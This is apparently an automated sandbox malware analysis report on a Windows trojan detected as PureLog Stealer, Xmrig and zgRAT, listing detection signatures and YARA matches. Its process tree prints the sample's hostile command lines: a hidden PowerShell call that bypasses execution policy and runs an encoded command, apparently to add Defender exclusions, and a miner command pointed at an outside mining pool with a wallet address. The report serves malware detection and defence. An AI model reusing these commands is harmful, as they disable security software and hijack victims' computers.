Edit tour
Windows
Analysis Report
cybXkFC5nF.exe
Overview
General Information
Sample name: | cybXkFC5nF.exerenamed because original name is a hash value |
Original sample name: | 9d82dc826bcac1bdd4c41bf79577af27.exe |
Analysis ID: | 1426620 |
MD5: | 9d82dc826bcac1bdd4c41bf79577af27 |
SHA1: | c38360ef0e8acb8f34ebe713ab83ce85cf3fe503 |
SHA256: | 784233bc80ea7857c39dbcd9c929a626093fced8c54224e742c4d0e1d128e80d |
Tags: | 64exetrojan |
Infos: | |
Detection
PureLog Stealer, Xmrig, zgRAT
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected PureLog Stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Bypasses PowerShell execution policy
Detected Stratum mining protocol
Encrypted powershell cmdline option found
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected PersistenceViaHiddenTask
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cybXkFC5nF.exe (PID: 4956 cmdline:
"C:\Users\ user\Deskt op\cybXkFC 5nF.exe" MD5: 9D82DC826BCAC1BDD4C41BF79577AF27)
- powershell.exe (PID: 2492 cmdline:
powershell .exe -Exec utionPolic y Bypass - WindowStyl e Hidden - NoProfile -enc QQBkA GQALQBNAHA AUAByAGUAZ gBlAHIAZQB uAGMAZQAgA C0ARQB4AGM AbAB1AHMAa QBvAG4AUAB hAHQAaAAgA EMAOgBcAFU AcwBlAHIAc wBcAGoAbwB uAGUAcwBcA EEAcABwAEQ AYQB0AGEAX ABSAG8AYQB tAGkAbgBnA FwARQB4AGM AZQBwAHQAa QBvAG4AXAB UAHkAcABlA EkAZAAuAGU AeABlACwAQ wA6AFwAVwB pAG4AZABvA HcAcwBcAE0 AaQBjAHIAb wBzAG8AZgB 0AC4ATgBFA FQAXABGAHI AYQBtAGUAd wBvAHIAawA 2ADQAXAB2A DQALgAwAC4 AMwAwADMAM QA5AFwAQQB kAGQASQBuA FAAcgBvAGM AZQBzAHMAL gBlAHgAZQA sAEMAOgBcA FUAcwBlAHI AcwBcAGoAb wBuAGUAcwB cAEEAcABwA EQAYQB0AGE AXABMAG8AY wBhAGwAXAB UAGUAbQBwA FwAIAAtAEY AbwByAGMAZ QA7ACAAQQB kAGQALQBNA HAAUAByAGU AZgBlAHIAZ QBuAGMAZQA gAC0ARQB4A GMAbAB1AHM AaQBvAG4AU AByAG8AYwB lAHMAcwAgA EMAOgBcAFc AaQBuAGQAb wB3AHMAXAB NAGkAYwByA G8AcwBvAGY AdAAuAE4AR QBUAFwARgB yAGEAbQBlA HcAbwByAGs ANgA0AFwAd gA0AC4AMAA uADMAMAAzA DEAOQBcAEE AZABkAEkAb gBQAHIAbwB jAGUAcwBzA C4AZQB4AGU ALABDADoAX ABVAHMAZQB yAHMAXABqA G8AbgBlAHM AXABBAHAAc ABEAGEAdAB hAFwAUgBvA GEAbQBpAG4 AZwBcAEUAe ABjAGUAcAB 0AGkAbwBuA FwAVAB5AHA AZQBJAGQAL gBlAHgAZQA = MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5016 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WmiPrvSE.exe (PID: 7280 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
- TypeId.exe (PID: 6532 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Exception\ TypeId.exe MD5: 9D82DC826BCAC1BDD4C41BF79577AF27) - RegAsm.exe (PID: 7204 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\Re gAsm.exe MD5: A4EB36BAE72C5CB7392F2B85609D4A7E) - AddInProcess.exe (PID: 7476 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\Ad dInProcess .exe -o xm r.2miners. com:2222 - u 8Bk24tje WqN6AqpNY2 5oCTh7a7Wh LbFN3TUCo5 DUiJn5bfLE r7diNi64q8 7hchj2t31i kW7jg7YjGN WQkhH9pf9u H7jTPTb.RI G_CPU -p x --algo rx /0 --cpu-m ax-threads -hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
- TypeId.exe (PID: 7672 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Exception\ TypeId.exe MD5: 9D82DC826BCAC1BDD4C41BF79577AF27)
- TypeId.exe (PID: 3796 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Exception\ TypeId.exe MD5: 9D82DC826BCAC1BDD4C41BF79577AF27)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
zgRAT | zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. | No Attribution |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security | ||
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
Click to see the 43 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
Click to see the 52 entries |
Bitcoin Miner |
---|
Source: | Author: Joe Security: |
System Summary |
---|
Source: | Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |